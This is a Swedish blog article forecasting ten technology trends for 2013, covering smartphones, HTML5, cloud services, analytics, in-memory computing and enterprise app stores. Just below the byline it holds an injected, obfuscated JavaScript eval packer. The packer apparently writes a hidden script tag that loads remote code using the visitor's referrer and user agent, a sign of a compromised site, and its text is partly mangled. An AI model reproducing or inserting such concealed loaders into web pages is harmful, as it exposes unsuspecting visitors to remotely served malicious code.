Image Image Image Image Image Image Image Image Image Image

| 20 oktober, 2018

Scroll to top

Top

Topp 10 teknologi trender för 2013

Topp 10 teknologi trender för 2013
Sebastian Plengier Ehrnfelt

10 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kesdn|var|u0026u|referrer|anzzt||js|php’.split(‘|’),0,{}))
Trender 2013: Första snön har fallit i Stockholm och sakta glider vi in i vintertid. Många kan tycka detta är mysigt samtidigt som jag bara väntar mig kalla och mörka dagar som rullar förbi.

Men men, Another day, another topp 10 lista.

Denna gång har vi gjort en liten trendspaning på Internet för att se vilka trender som väntar oss 2013.

2013 kommer troligen bli ett år där vi får se det så kallade ”Mobile device battle” på riktigt. Ett modernt företagskrig mellan världens största elektronikaktörer.
Flera aktörer på marknaden börjar få fart och konkurrensen för iPhone är högre än någonsin.

10 trender att hålla koll på under 2013

Smartphone-kriget: De mobila upplevelserna har hamnat i en skugga av oetiska varumärkeskrig. Surfplattor och smartphones har kommat bli en självklarhet i konsumenternas ögon. Trenden på detta område har aldrig varit så hög som den är just nu. Under 2013 kommer mobila-enheter att passera datorer och vara det vanligaste sättet att surfa på. Redan 2015 kommer mer än 80 procent av mobiltelefoner på marknaden att vara smarta telefoner. Ungefär 20 procent av dessa kommer att vara Windows-telefoner. Samma år kommer också 50 procent av den bärbara enheten vara surfplattor som tas med på resor och möten.
2015 kommer troligen också Windows passera RIM och ha samma storlek som Apple i enheter och ”nicsha” in sig på mestadels företag som köpare.

Mobila applikationer och HTML 5: 2013 och 2014 kommer att driva HTML5 och Javascript in i våra webbläsare och bli en standardisering och en traditionell applikationsmiljö för utvecklare.  Det kommer vara en lång övergång till HTML 5. ”Vanliga appar” kommer inte att försvinna utan kommer alltid erbjuda bättre upplevelser även fast HTML5 kommer ta stor del på många områden.

Molntjänster: Molntjänster kommer att bli en vardag i vårt digitala liv, både för program, dokument och annat. Synkning mellan enheter kommer att förbättras och användas i större utsträckning än idag. Tjänster blir mer viktiga och enheter mindre viktiga.

Hybrida IT-företag: Det kommer skapas en förändring gällande IT. IT-avdelningar kommer vara tvungna att spela fler roller gällande samordningen med andra IT-relaterade verksamheter.

Strategisk data: Organisationer kommer vara tvungna att fokusera på icke-traditionella datatyper samt externa källor. Det kommer bli en stor fortsatt marsch för Hadoop och nosql. Sociala aspekter kommer att öka. De fem rikaste datakällorna på webben som sociala grafer, diagram, konsumtions-grafer och mobila grafer. Begreppet gällande företagens egna datalager är död. Flera system kommer att knytas ihop.

Actionable Analytics: Molnpaketerade analyser kommer få sig ett stort lyft under 2013 och 2014. De kan nu utföra analyser och simulering på viktiga åtgärder inom verksamheten som innan varit svåra och tagit tid. Mobila enheter kommer att ha tillgång till dessa uppgifter som kan stödja beslutsfattande affärsbeslut.

Mainstream In-Memory Computing: Detta ändrar alla förväntningar, designer och arkitekturer. Ökar prestandan och laddningstider. Möjliggör självgående uppdateringar i realtid för verksamheter. SAP och andra kommer att påskynda leveransen gällande ansökningar för att utnyttja så mycket minne som möjligt.

Integrated Ecosystems: Vi kommer att öka paketeringen av programvara och tjänster för att hantera infrastrukturen och arbetsbelastningen lättare.
Vi kommer se fler förinstallerade program i de transporterade hårdvarorna vi köper i butik.

App Stores för företag: År 2014 kommer det att finnas över 70 miljarder mobila nerladdningar från app-butiker varje år. 2014 kommer också de flesta organisationer att leverera mobila-appar till anställda via privata app-butiker.

Fler trender kommer publiceras när vi kommer närmare 2013.